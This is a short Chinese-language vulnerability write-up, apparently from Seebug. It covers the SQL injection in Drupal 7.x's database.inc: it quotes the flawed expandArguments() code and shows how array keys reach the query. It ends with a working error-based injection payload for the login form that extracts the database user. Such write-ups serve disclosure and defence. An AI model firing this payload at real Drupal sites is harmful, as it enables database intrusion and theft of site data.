Drupal 7.x /includes/database/database.inc SQL注入漏洞

<ul><li>Includes/database/database.inc</li></ul><pre class=""> protected function expandArguments(&amp;$query, &amp;$args) { $modified = FALSE; foreach (array_filter($args, 'is_array') as $key =&gt; $data) { $new_keys = array(); foreach ($data as $i =&gt; $value) { $new_keys[$key . '_' . $i] = $value; } $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query); unset($args[$key]); $args += $new_keys; $modified = TRUE; } </pre><p>当被调用的参数array没有key，</p><pre class="">db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=&gt;array('user1','user2')));</pre><p>执行的SQL语句为：</p><pre class="">SELECT * from users where name IN (:name_0, :name_1)&nbsp;</pre><p>当array参数有key，</p><pre class="">db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=&gt;array('test -- ' =&gt; 'user1','test' =&gt; 'user2')));</pre><p>执行的SQL语句为：</p><pre class="">SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1</pre><p>此时预处理时将key带入SQL语句，作为SQL语句的一部分，造成注入。</p><p>当用户提交：</p><pre class="">name[0 and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from&nbsp; information_schema.tables group by x)a);;#];=test&amp;name[0]=test2&amp;pass=test&amp;form_id=user_login_block</pre><p>执行的SQL语句为：</p><pre class="">SELECT * FROM users WHERE name = 'test2' and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from&nbsp; information_schema.tables group by x)a);;#, 'test2' AND status = 1</pre><p>页面返回：&nbsp;</p><p><img alt="21634353-93DC-40EF-82A6-E31D6F42CD8F.png" src="https://images.seebug.org/@/uploads/1434521855861-21634353-93DC-40EF-82A6-E31D6F42CD8F.png" data-image-size="763,233"><br></p><p>证明漏洞存在。</p>